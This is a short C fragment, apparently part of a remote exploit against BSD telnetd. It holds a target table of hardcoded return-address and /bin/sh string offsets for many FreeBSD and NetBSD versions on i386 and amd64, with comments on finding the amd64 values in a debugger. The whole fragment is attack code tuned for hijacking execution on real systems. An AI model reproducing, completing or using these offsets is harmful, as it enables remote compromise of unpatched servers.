typedef struct {
        char *       desc;           /* distribution */
        char *       retloc;         /* return address location, for amd64 this is the execv() address in the telnetd binary*/
	char *	     binshloc1;	     /* for amd64:
					set breakpoint on retloc then inspect $rbx, binshloc1 value will be $rbx + 0x10 */
	char *	     binshloc2;      /* for amd64: binshloc1 + 4 */	
	char * 	     os;	     /* operating system & architecture */
} tgt_type;

/* i386 & amd64 offsets are pretty stable now :> -kc */
static tgt_type targets[] = {
		{"FreeBSD 8.2 i386", "\xa0\xe6\x05\x08", NULL, NULL, "FreeBSD"},
		{"FreeBSD 8.0/8.1/8.2 i386", "\x40\xb6\x05\x08", NULL, NULL,"FreeBSD"},
		{"FreeBSD 7.3/7.4 i386", "\x80\xa6\x05\x08", NULL, NULL, "FreeBSD"},
		{"FreeBSD 6.2/6.3/6.4 i386", "\x40\x96\x05\x08", NULL, NULL, "FreeBSD"},
		{"FreeBSD 5.3/5.5 i386", "\xe0\x96\x05\x08", NULL, NULL, "FreeBSD"},
		{"FreeBSD 4.9/4.11 i386", "\x40\x7b\x05\x08", NULL, NULL, "FreeBSD"},
		{"NetBSD 5.0/5.1 i386", "\xa0\xab\x05\x08", NULL, NULL, "NetBSD"},
		{"NetBSD 4.0 i386", "\x54\x9b\x05\x08", NULL, NULL, "NetBSD"},
		{"FreeBSD 8.2 amd64", "\x6a\x5f\x40\x00\x00\x00\x00\x00", "\x10\x3c\x51\x00", "\x14\x3c\x51\x00", "FreeBSD64"},
		{"FreeBSD 8.0/8.1 amd64", "\x6a\x5f\x40\x00\x00\x00\x00\x00", "\x30\x35\x51\x00", "\x34\x35\x51\x00","FreeBSD64"},				
		{"FreeBSD 7.1/7.3/7.4 amd64", "\x1a\x5d\x40\x00\x00\x00\x00\x00", "\x50\x31\x51\x00", "\x54\x31\x51\x00", "FreeBSD64"},
		{"FreeBSD 7.1 amd64", "\xba\x5c\x40\x00\x00\x00\x00\x00", "\xf0\x30\x51\x00", "\xf4\x30\x51\x00", "FreeBSD64"},
		{"FreeBSD 7.0 amd64", "\xaa\x5c\x40\x00\x00\x00\x00\x00", "\xd0\x30\x51\x00", "\xd4\x30\x51\x00", "FreeBSD64"},
		{"FreeBSD 6.4 amd64", "\xcb\x5f\x40\x00\x00\x00\x00\x00", "\xd0\x30\x51\x00", "\xd4\x30\x51\x00", "FreeBSD64"},
		{"FreeBSD 6.3 amd64", "\xbb\x5f\x40\x00\x00\x00\x00\x00", "\x90\x30\x51\x00", "\x94\x30\x51\x00", "FreeBSD64"},
		{"FreeBSD 6.2 amd64", "\x6b\x5f\x40\x00\x00\x00\x00\x00", "\x50\x30\x51\x00", "\x54\x30\x51\x00", "FreeBSD64"},
		{"FreeBSD 6.1 amd64", "\x6b\x5f\x40\x00\x00\x00\x00\x00", "\x10\x30\x51\x00", "\x14\x30\x51\x00", "FreeBSD64"},
		{"TESTING i386", "\x43\x43\x43\x43", NULL, NULL, "FreeBSD"},
		{"TESTING amd64", "\x43\x43\x43\x43\x43\x43\x43\x43", "\x42\x42\x42\x42", "\x41\x41\x41\x41", "FreeBSD64"},
	        { NULL, 0},
};
